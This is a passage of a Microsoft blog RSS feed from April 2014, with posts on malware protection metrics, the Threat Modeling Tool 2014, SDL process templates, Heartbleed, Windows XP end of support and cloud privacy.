src="http://blogs.technet.com/aggbug.aspx?PostID=3627860&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesBrendon Lynchscott charneyTrustTrustworthy ComputingMicrosoftpersonal dataDataPrivacy Protection metrics trends – First quarter 2014 resultshttp://blogs.technet.com/b/mmpc/archive/2014/04/17/protection-metrics-trends-first-quarter-2014-results.aspxThu, 17 Apr 2014 22:14:25 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:9f0c7fd0-13b1-48db-9eba-f4bada8c0db5msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/04/17/protection-metrics-trends-first-quarter-2014-results.aspx#comments<p>​It&#39;s been a few months since our last post on our metrics. I wanted to give you an update on families that are declining, new ones that are moving in, and on the way we&#39;re calculating our protection metrics to make them more accurate.</p> <p>Overall, our infection impact (0.29% for January to March) has remained consistently low since December. A few families have declined, but others have moved into their place. Our incorrect detections have stayed under 0.001% and our performance metrics remain fairly consistent.</p> <p><strong>Declining families</strong></p> <p>The &quot;Sefnit trio&quot;, mentioned in several of our <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/14/protection-metrics-december-results.aspx"> prior blog posts</a>, have declined significantly (although Sefnit itself has picked up in March through exploring new distribution methods). At the peak in October 2013, these families were contributing to nearly one-fifth of the customer infections we saw that month. Now they are down to 7%.</p> <p><strong>New families</strong></p> <p>Spacekito and Clikug are recent additions. <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=MSIL/Spacekito#tab=2"> Spacekito</a> is distributed through a software bundler and claims to be a &quot;browser protector.&quot; It exfiltrates data about the system upon which it&#39;s installed, serves ads, and aggressively reinstalls itself, so it&#39;s difficult for our customers to remove if they don&#39;t want it anymore.</p> <p><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Clikug.A"> Clikug</a> uses your computer for click-fraud, which happens in the background. You may simply notice that your computer is sluggish.</p> <p><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Zbot"> Zbot</a> isn&#39;t new, but since late last year it has been aggressively distributed by <a href="http://www.microsoft.com/en-us/search/results.aspx?q=Upatre+site:http://www.microsoft.com/security/portal"> Upatre</a> (through spam), which is another family that is edging up the ranks in our top 20 list impacting our customers.</p> <p><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Wysotot"> Wysotot</a>, which we first mentioned in our <a href="http://blogs.technet.com/b/mmpc/archive/2013/12/23/protection-metrics-november-results.aspx"> Nov results</a>, is also still a top player in terms of customer impact. Wysotot is typically installed on your computer through software bundlers that advertise free software or games.</p> <p><strong>Protection metrics update</strong></p> <p>You may notice a few changes on the <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection.aspx"> Evaluating our protection performance and capabilities page</a>: we&#39;ve updated the way we calculate our infection and incorrect detection impact. In the past, we counted the number of computers that downloaded an update for one of our real-time protection products. Although most of our customers opt in to report threat telemetry to us, some don&#39;t.</p> <p>In the past, our products weren&#39;t instrumented to give us accurate counts of people that opted to share their&nbsp;telemetry, and thus the potential population that could report a threat wasn&#39;t easy to discern &ndash; we had to rely on our update numbers.</p> <p>In 2013, we shipped a new feature to alleviate this. Essentially, on regular intervals, computers running Microsoft antimalware that have opted to provide this information&nbsp;will send a signal that lets us know they&#39;re still protected and helps us count the true number of computers that could report a threat to us.</p> <p>The feature was deployed to all of our customers starting in July, so our new trends on the <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection.aspx"> Evaluating our protection performance and capabilities page</a> start in Aug 2013. This new denominator provides a much more accurate figure for our infection and incorrect detection impact.</p> <p>In our upcoming <a href="http://www.microsoft.com/security/sir/"> Security Intelligence Report</a> (SIRv16), we&#39;ll also be using this same denominator to report the malware encounter rate.</p> <p>I hope this post provides you with insight into how we&#39;re measuring our protection and performance for our customers that choose us for protection. We truly strive to be transparent in how we measure ourselves, and also to&nbsp;provide our customers with an optimal balance of protection and performance.</p> <p>&nbsp;</p> <p>-Holly Stewart<br />MMPC</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3627566&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> New Association of Accessibility Professionals Kicks Off Work with New Members and Great Supporthttp://blogs.msdn.com/b/accessibility/archive/2014/04/17/iaap-kicks-off.aspxThu, 17 Apr 2014 14:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10518126Daniel Hubbell - MSFT1http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10518126http://blogs.msdn.com/b/accessibility/archive/2014/04/17/iaap-kicks-off.aspx#commentsThis blog post was written by Rob Sinclair, Microsoft&rsquo;s Chief Accessibility Officer. Rob is responsible for the company's worldwide strategy to develop software and services that make it easier for people of all ages and abilities to see, hear,...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/04/17/iaap-kicks-off.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10518126" width="1" height="1"> The Evolving Pursuit of Privacyhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/15/the-evolving-pursuit-of-privacy.aspxTue, 15 Apr 2014 18:07:50 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:3f8f9512-8186-45f6-832b-dcc0ffc046cfTrusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong></p> <p>In my role, I have the opportunity to discuss privacy with a wide variety of people &ndash; Microsoft&rsquo;s customers and partners, policymakers, advocates and industry colleagues. In recent weeks, I participated in many such conversations at the RSA Conference and the International Association of Privacy Professionals (IAPP) Global Privacy Summit.&nbsp; <a href="/b/trustworthycomputing/archive/2014/04/14/the-evolving-pursuit-of-privacy.aspx">See more&gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/15/the-evolving-pursuit-of-privacy.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627406&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesBrendon Lynchscott charneyprivacy and reliabilityStandardsTrustworthy Computingpersonal dataDataPrivacy New Microsoft Threat Modeling Tool 2014 Now Availablehttp://blogs.technet.com/b/security/archive/2014/04/15/new-microsoft-threat-modeling-tool-2014-now-available.aspxTue, 15 Apr 2014 17:09:58 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:80c56b15-b720-4dfe-a3b3-d4e8a81c59feTim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3627470http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3627470http://blogs.technet.com/b/security/archive/2014/04/15/new-microsoft-threat-modeling-tool-2014-now-available.aspx#comments<p>Today we&rsquo;re announcing the release of the&nbsp;<strong><a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi">Microsoft Threat Modeling Tool 2014</a></strong>. This is the latest version of the free&nbsp;<a href="/b/security/archive/2012/08/23/microsoft-s-free-security-tools-threat-modeling.aspx">Security Development Lifecycle Threat Modeling Tool&nbsp;</a>that was previously released back in 2011.</p> <p>More and more of the customers I have been talking to have been leveraging threat modeling as a systematic way to find design-level security and privacy weaknesses in systems they are building and operating. Threat modeling is also used to help identify mitigations that can reduce the overall risk to a system and the data it processes. Once customers try threat modeling, they typically find it to be a useful addition to their approach to risk management.&nbsp;&nbsp;</p> <p>We have been threat modeling at Microsoft for more than 10 years. It is a key piece of the design phase of the&nbsp;<a href="http://www.microsoft.com/security/sdl/default.aspx">Microsoft Security Development Lifecycle&nbsp;</a>(SDL).&nbsp; In 2011 we released the SDL Threat Modeling Tool, free of charge, to make it easier for customers and partners to threat model as part of their software development processes. The tool has been very popular and we have received a lot of positive customer feedback in addition to suggestions for improvement.&nbsp;<a href="/b/security/archive/2014/04/15/new-microsoft-threat-modeling-tool-2014-now-available.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/04/15/new-microsoft-threat-modeling-tool-2014-now-available.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627470&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">threat modeling toolTMTSDLSecurity Development Lifecycle Introducing Microsoft Threat Modeling Tool 2014http://blogs.msdn.com/b/sdl/archive/2014/04/15/introducing-microsoft-threat-modeling-tool-2014.aspxTue, 15 Apr 2014 17:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10517297SDL Team10http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10517297http://blogs.msdn.com/b/sdl/archive/2014/04/15/introducing-microsoft-threat-modeling-tool-2014.aspx#comments<p>Today, we are excited to announce the general availability of a new version of a very popular Security Development Lifecycle tool &ndash;<a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi"> Microsoft Threat Modeling Tool 2014</a>. It&rsquo;s available as a free download from Microsoft Download Center <a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi">here</a>.</p> <p>Threat modeling is an invaluable part of the <a href="http://www.microsoft.com/security/sdl">Security Development Lifecycle</a> (SDL) process. We have discussed in the past how applying a structured approach to threat scenarios during the design phase of development helps teams more effectively and less expensively identify security vulnerabilities, determine risks from those threats, and establish appropriate mitigations.</p> <p>For those who would like more of an introduction to threat modeling, please visit <a href="http://msdn.microsoft.com/en-us/magazine/cc163519.aspx">Threat Modeling: Uncover Security Design Flaws Using the STRIDE Approach</a>. But, without further ado, let&rsquo;s dig into the fun stuff &ndash; the new features of Threat Modeling Tool 2014.</p> <p><span style="font-size: medium;"><strong>Microsoft Threat Modeling Tool 2014 - Changes and New Features</strong></span></p> <p>Microsoft announced the general availability of the SDL Threat Modeling Tool v3.1.8 in 2011, which gave software development teams an approach to design their security systems following the threat modeling process. <a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi">Microsoft Threat Modeling Tool 2014</a> introduces many improvements and new features, see the highlights below.</p> <p><span style="font-size: x-small;"><strong>&nbsp;Figure 1. Microsoft Threat Modeling Tool 2014 Home Screen</strong></span></p> <p><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/2626.1.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/2626.1.png" alt="" border="0" /></a></p> <p><span style="font-size: x-small;"><strong><br /></strong></span></p> <p><span style="text-decoration: underline;"><span style="font-size: small;"><strong>NEW DRAWING SURFACE</strong></span></span><br />One of our goals with this release is to provide a simplified workflow for building a threat model and help remove existing dependencies. You&rsquo;ll find intuitive user interface with easy navigation between different modes. The new version of the tool has a new drawing surface and <strong>Microsoft Visio is no longer required</strong> to create new threat models. Using the Design View of the tool, you can create your data flow diagram using the included stencil set (see&nbsp;<strong>Figure 2</strong>).</p> <p><span style="font-size: x-small;"><strong>Figure 2. Microsoft Threat Modeling Tool 2014 - Design View</strong></span></p> <p><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/0268.2.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/0268.2.png" alt="" border="0" /></a></p> <p><span style="font-size: x-small;"><strong><br /></strong></span></p> <p><strong><span style="text-decoration: underline;">MIGRATION FOR V3 THREAT MODELS</span></strong><br />Threat modeling is an iterative process. Development teams create threat models which evolve over time as systems and threats change. We wanted to make sure the new tool supports this flow. Microsoft Threat Modeling Tool 2014 offers migration of threat models created with version 3.1.8, which allows an easy update to existing threat models of security system designs. (NOTE: For migrating threat models from v3.1.8 only, Microsoft Visio 2007 or later is required). Threat models created with v3 version of the tool (.tms format) can be migrated to new format (.tm4) (see&nbsp;<strong>Figure 3</strong>).</p> <p><span style="font-size: x-small;"><strong>Figure 3. Migrating v3 Threat Models</strong></span></p> <p><span style="font-size: x-small;"><strong><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/3426.3.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/3426.3.png" alt="" border="0" /></a><br /></strong></span></p> <p>&nbsp;</p> <p><strong><span style="text-decoration: underline;">STRIDE PER INTERACTION</span></strong><br />One of the key changes we are introducing is the update to threat generation logic. With previous versions of the tool we have taken the approach of using STRIDE per element. Microsoft Threat Modeling Tool 2014 uses STRIDE categories and generates threats based on the interaction between elements.&nbsp; We take into consideration the type of elements used on the diagram (e.g. processes, data stores etc.) and what type of data flows connect these elements. When in Analysis View, the tool will show the suggested threats for your data flow diagram in a simple grid (see&nbsp;<strong>Figure 4</strong>).</p> <p><span style="font-size: x-small;"><strong>Figure 4. Microsoft Threat Modeling Tool 2014 &ndash; Analysis View</strong></span></p> <p><span style="font-size: x-small;"><strong><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/6557.4.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/6557.4.png" alt="" border="0" /></a></strong></span></p> <p><span style="text-decoration: underline;"><strong><br />DEFINE YOUR OWN THREATS</strong></span><br />Microsoft Threat Modeling Tool 2014 comes with a base set of threat definitions using STRIDE categories. This set includes only suggested threat definitions and mitigations which are automatically generated to show potential security vulnerabilities for your data flow diagram. You should analyze your threat model with your team to ensure you have addressed all potential security pitfalls. To offer more flexibility, Microsoft Threat Modeling Tool 2014 gives users the option to add their own threats related to their specific domain. This means users can extend the base set of threat definitions by authoring the provided XML format. For details on adding your own threats, see the Threat Modeling tool SDK. With this feature, we have higher confidence that our users can get the best possible picture of their threat landscape (see&nbsp;<strong>Figure 5</strong>).&nbsp;</p> <p><span style="font-size: x-small;"><strong>Figure 5. Threat Model Definitions Grammar in Backus-Naur Form (BNF)</strong></span></p> <p><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/0243.5.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/0243.5.png" alt="" border="0" /></a></p> <p><br />We hope these new enhancements in <a href="http://download.microsoft.com/download/3/8/0/3800050D-2BE7-4222-8B22-AF91D073C4FA/MSThreatModelingTool2014.msi">Microsoft Threat Modeling Tool 2014</a> will provide greater flexibility and help enable you to effectively implement the SDL process in your organization.</p> <p>Thank you to all who helped shipping this release through internal and external feedback. Your input was critical to improving the tool and customer experience.</p> <p><strong>For more information and additional resources, visit:</strong></p> <ul> <li><span style="font-size: small;"><a href="http://www.microsoft.com/security/sdl">Microsoft Security Development Lifecycle (SDL)</a></span></li> <li><a href="http://msdn.microsoft.com/en-us/magazine/cc163519.aspx">Uncover Security Design Flaws Using the STRIDE Approach</a></li> <li><span style="font-size: small;"><a href="http://www.microsoft.com/security/sdl/adopt/eop.aspx">Getting Started with Threat Modeling: Elevation of Privilege (EoP) Game</a></span></li> <li><span style="font-size: small;"><a href="http://msdn.microsoft.com/en-us/magazine/cc700352.aspx">Reinvigorate your Threat Modeling Process</a></span></li> <li><span style="font-size: small;"><a href="http://msdn.microsoft.com/en-us/magazine/dd148644.aspx">Threat Models Improve Your Security Process</a></span></li> <li><span style="font-size: small;"><a href="http://threatmodelingbook.com/">Threat Modeling: Designing for Security (BOOK)</a></span></li> </ul> <p>&nbsp;</p> <p><strong>Emil Karafezov</strong> is a Program Manager on the Secure Development Tools and Policies team at Microsoft. He&rsquo;s responsible for the Threat Modeling component of the Security Development Lifecycle (SDL).</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10517297" width="1" height="1">Threat Modeling ToolSTRIDETMTThreat Modeling Tool 2014 SDL Process Templates for Visual Studio Team Foundation Server 2013http://blogs.msdn.com/b/sdl/archive/2014/04/15/sdl-process-templates-for-visual-studio-team-foundation-server-2013.aspxTue, 15 Apr 2014 17:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10517311SDL Team0http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10517311http://blogs.msdn.com/b/sdl/archive/2014/04/15/sdl-process-templates-for-visual-studio-team-foundation-server-2013.aspx#comments<p><span style="font-family: verdana, geneva;">Today, we are excited to announce the general availability of a new version SDL process templates:</span></p> <ul> <li><span style="font-family: verdana, geneva; font-size: small;"><a href="http://download.microsoft.com/download/6/B/1/6B17D961-2207-4AA7-B043-019C041E9966/MSF for Agile 2013 plus Security Development Lifecycle.msi">Microsoft Solutions Framework (MSF) for&nbsp;Agile 2013 plus Security Development Lifecycle (SDL)&nbsp;</a></span></li> <li><span style="font-family: verdana, geneva; font-size: small;"><a href="http://download.microsoft.com/download/F/C/C/FCC3BD51-AAB4-4AF2-A628-4197492C67CD/MSF for CMMI 2013 plus Security Development Lifecycle.msi">Microsoft Solutions Framework (MSF) for Capability Maturity Model Integration (CMMI) 2013 plus Security Development Lifecycle (SDL)</a>&nbsp;&nbsp;</span></li> </ul> <p><span style="font-family: verdana, geneva;">This version of the SDL Process Templates is specific to the </span><a style="font-family: verdana, geneva;" href="http://msdn.microsoft.com/en-us/security/cc420639.aspx">Microsoft Security Development Lifecycle version 5.2</a><span style="font-family: verdana, geneva;">.&nbsp;</span></p> <p><span style="font-family: verdana, geneva;">The SDL Process Templates automatically integrate policy, process and tools associated with the Microsoft Security Development Lifecycle (SDL) in <a href="http://www.visualstudio.com/en-us/visual-studio-homepage-vs.aspx">Visual Studio 2013</a> and <a href="http://msdn.microsoft.com/en-us/vstudio/ff637362.aspx">Visual Studio Team Foundation Server</a> (TFS). With the process templates code checked into the Visual Studio TFS source repository by the developer is analyzed to ensure that it complies with SDL secure development practices. The templates also create security workflow tracking items for manual SDL processes such as threat modeling to ensure that these important security activities are not accidentally skipped or forgotten.</span></p> <p><span style="font-family: verdana, geneva;">The SDL Process Templates include:&nbsp;</span></p> <ul> <li><span style="font-family: verdana, geneva; font-size: small;">SDL-based customized check-in policies</span></li> <li><span style="font-family: verdana, geneva; font-size: small;">Security work items</span></li> <li><span style="font-family: verdana, geneva; font-size: small;">Security dashboard</span></li> <li><span style="font-family: verdana, geneva; font-size: small;">Integration with SDL process guidance</span></li> <li><span style="font-family: verdana, geneva; font-size: small;">Customized security queries</span></li> </ul> <p><span style="font-size: x-small; font-family: verdana, geneva;"><strong>Figure 1 Visual Studio 2013 Team Foundation Server Security Dashboard</strong></span></p> <p><a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/7522.6.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/7522.6.png" alt="" border="0" /></a></p> <p><span style="font-size: medium; font-family: verdana, geneva;"><strong><br /></strong></span></p> <p><span style="font-size: medium; font-family: verdana, geneva;"><strong>Eases the adoption of the SDL</strong></span><br /><span style="font-family: verdana, geneva;">The SDL Process Templates automate the creation of SDL requirements and enables development teams to begin adopting the SDL process without having to be fully trained on the SDL. It integrates the SDL into everyday tasks by leveraging the existing development environment (Visual Studio) and the project-wide framework (TFS) in a way that is familiar to program managers and testers, as well as developers.</span><br /><span style="font-size: medium; font-family: verdana, geneva;"><strong><br /></strong></span></p> <p><span style="font-size: medium; font-family: verdana, geneva;"><strong>Provides auditable security requirements and status</strong></span><br /><span style="font-family: verdana, geneva;">The SDL Process Templates include the Security Dashboard which provides an up-to-the- minute overview of security issues and status for all security requirements associated with a project. This report allows management to document and verify that SDL requirements were met prior to a product&rsquo;s release.</span><br /><span style="font-size: medium; font-family: verdana, geneva;"><strong><br /></strong></span></p> <p><span style="font-size: medium; font-family: verdana, geneva;"><strong>Demonstrates security return on investment</strong></span><br /><span style="font-family: verdana, geneva;">The SDL Process Templates allow for the integration of third-party tools that work with TFS. Through reporting, the template provides data that allows you to assess the effectiveness of your security tools. In addition, the template enables you to experience the benefits of the SDL by discovering security issues early in your development lifecycle, reducing the total cost of development.</span><br /><br /><br /></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10517311" width="1" height="1">Process Templates for Visual Studio New Story Explores Braille’s Role and Use in Accessible Technology and the Digital Agehttp://blogs.msdn.com/b/accessibility/archive/2014/04/15/new-story-explores-braille-s-role-and-use-in-accessible-technology-and-the-digital-age.aspxTue, 15 Apr 2014 16:18:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10518129Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10518129http://blogs.msdn.com/b/accessibility/archive/2014/04/15/new-story-explores-braille-s-role-and-use-in-accessible-technology-and-the-digital-age.aspx#commentsIn some ways Braille was one of the original accessible technologies, one that opened up a universe of books and reading material to blind readers. The explosion of modern technology, though, is changing how Braille is used. A new story by NPR explores...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/04/15/new-story-explores-braille-s-role-and-use-in-accessible-technology-and-the-digital-age.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10518129" width="1" height="1"> April 2014 Security Bulletin Webcast and Q&Ahttp://blogs.technet.com/b/msrc/archive/2014/04/11/april-2014-security-bulletin-webcast-and-q-amp-a.aspxFri, 11 Apr 2014 20:40:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:c5d107dc-d9da-48c6-925c-9706fa86c319Dustin C. Childs0<p>Today we published the <a href="http://blogs.technet.com/b/msrc/p/april-2014-security-bulletin-q-a.aspx">April 2013 Security Bulletin Webcast Questions &amp; Answers page</a>. We answered 13 questions in total, with the majority focusing on the update for Internet Explorer (<a href="https://technet.microsoft.com/security/bulletin/ms14-018">MS14-018</a>) and the Windows 8.1 Update (<a href="http://support.microsoft.com/kb/2919355">KB2919355</a>). Two questions that were not answered on air have been included on the Q&amp;A page.</p> <p>Here is the video replay.</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/DpKwsISWMjA?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed width="500" height="281" src="http://www.youtube.com/v/DpKwsISWMjA?version=3&amp;hl=en_US" type="application/x-shockwave-flash" /></object></p> <p>For those of you following the ongoing investigation around the industry-wide issue known as &ldquo;Heartbleed,&rdquo; please refer to <a href="http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx">this post</a> on the Microsoft Security Blog for the status of our investigation.</p> <p>We invite you to join us for the next scheduled webcast on Wednesday, May 14, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the May bulletin release and answer your bulletin deployment questions live on the air.</p> <p>You can register to attend the webcast at the link below:</p> <p><b>Date: Wednesday, May 14, 2014<br /> Time: 11:00 a.m. PDT (UTC -7)<br /> Register: </b><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572979&amp;Culture=en-US"><b>Attendee Registration</b></a></p> <p>I look forward to seeing you next month.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3627283&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsBulletin WebcastSecurity Bulletin WebcastInternet Explorer (IE)Microsoft Office Microsoft Services unaffected by OpenSSL "Heartbleed" vulnerabilityhttp://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspxThu, 10 Apr 2014 21:03:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:c992c01c-b557-4eab-bcc9-c2ea05234614Microsoft Security Staff0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3627193http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3627193http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx#comments<p>Posted by:&nbsp;<strong>Tracey Pretorius,</strong>&nbsp;Director, Trustworthy Computing</p> <p>On April 8, 2014, security researchers announced a flaw in the OpenSSL encryption software library used by many websites to protect customers&rsquo; data. The vulnerability, known as &ldquo;Heartbleed,&rdquo; could potentially allow a cyberattacker to access a website&rsquo;s customer data along with traffic encryption keys.</p> <p>After a thorough investigation, we determined that Microsoft Services are not impacted by the OpenSSL &ldquo;Heartbleed&rdquo; vulnerability. In addition, Windows&rsquo; implementation of SSL/TLS was not impacted.</p> <p>Microsoft always encourages customers to be vigilant with the security of their online accounts, change their account passwords periodically and to use complex passwords. More information on how to create strong passwords is available here: <a href="https://www.microsoft.com/security/pc-security/password-checker.aspx">Microsoft Security &amp; Safety Center: Create strong passwords</a>. &nbsp;<a href="/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627193&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft SecurityOpenSSLencryption keysHeartbleedOpenSSL encryption software library TechNet Radio: IT Time - The Risk of Running Windows XP After Support Endshttp://blogs.technet.com/b/security/archive/2014/04/10/technet-radio-it-time-the-risk-of-running-windows-xp-after-support-ends2.aspxThu, 10 Apr 2014 20:42:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:23cd2f89-12f0-497c-b8f4-8d5c88fce0d2Microsoft Security Staff0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3627191http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3627191http://blogs.technet.com/b/security/archive/2014/04/10/technet-radio-it-time-the-risk-of-running-windows-xp-after-support-ends2.aspx#comments<p>On Monday, Tim Rains was featured on TechNet Radio in which he discussed &ldquo;The Risk of Running Windows XP After Support Ends&rdquo; with Blain Barton, Senior Technical Evangelist at Microsoft.&nbsp; This is a recommended video for any IT Professionals currently using Windows XP today in their environment.&nbsp; Questions covered in the discussion include:</p> <ul> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=3m44s">3:44</a>] What are the kind of security risks folks may face as support of XP ends?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=4m48s">4:48</a>] How does Microsoft protect its customers from security threats?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=6m11s">6:11</a>] What exactly does Windows XP end of support mean?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=8m38s">8:38</a>] What is risk of continuing to run XP?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=14m48s">14:48</a>] What motivates cyber attackers?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=18m17s">18:17</a>] What is ransomware?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=21m48s">21:48</a>] What are some typical threats users should expect against Windows XP?</span></li> <li><span style="font-size:small;">[<a href="http://channel9.msdn.com/Shows/TechNet+Radio/TechNet-Radio-IT-Time-The-Risk-of-Running-Windows-XP-After-Support-Ends#time=30m26s">30:26</a>] What should people do if they&rsquo;re running Windows XP?</span></li> </ul> <p><a href="/b/security/archive/2014/04/10/technet-radio-it-time-the-risk-of-running-windows-xp-after-support-ends2.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/04/10/technet-radio-it-time-the-risk-of-running-windows-xp-after-support-ends2.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3627191&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">TechNet Radio: IT TimeWindows XP End of SupportThe risk of running Windows XP after support ends Microsoft's cloud contracts approved by European privacy authorities http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/10/article-29-working-group-says-microsoft-cloud-in-line-with-eu-data-protection-law.aspxThu, 10 Apr 2014 20:03:53 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:c2d94518-e2d5-4a6a-b5f0-70d5f4a11b97Trusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong></p> <p>A big milestone was achieved this week.&nbsp; The <a href="http://ec.europa.eu/justice/data-protection/article-29/index_en.htm" target="_blank">Article 29 Working Party,</a> a collection of 28 European Union data protection authorities, announced that Microsoft&rsquo;s contractual approach to enterprise cloud services is in line with EU data protection law.&nbsp;&nbsp; <a 